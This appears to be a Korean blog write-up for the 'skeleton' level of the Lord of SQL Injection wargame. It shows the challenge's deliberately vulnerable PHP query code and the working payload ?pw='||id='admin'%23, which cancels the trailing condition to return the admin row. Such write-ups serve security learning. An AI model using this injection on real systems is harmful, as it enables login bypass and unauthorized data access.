query : select id from prob_skeleton where id='guest' and pw='' and 1=0
<?php
include "./config.php";
login_chk();
dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id from prob_skeleton where id='guest' and pw='{$_GET[pw]}' and 1=0";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysql_fetch_array(mysql_query($query));
if($result['id'] == 'admin') solve("skeleton");
highlight_file(__FILE__);
?>
if($result['id'] == 'admin') solve("skeleton");
쿼리의 결과값 id가 admin이면 됩니다. 소괄호를 필터링 중이고 pw 파라미터가 오는 곳 뒤에 and 1=0이 되어있습니다. 뒤를 무력화시켜야겠군요. 앞선 문제와 똑같은 페이로드로 문제를 해결할 수 있습니다.
?pw='||id='admin'%23
payload
'Web > LOS (Lord of SQL)' 카테고리의 다른 글
los(lord of sql) level 12 - darkknight (0) | 2018.08.21 |
---|---|
los(lord of sql) level 11 - golem (0) | 2018.08.21 |
los(lord of sql) level 9 - vampire (0) | 2018.08.21 |
los(lord of sql) level 8 - troll (0) | 2018.08.21 |
los(lord of sql) level 7 - orge (0) | 2018.08.21 |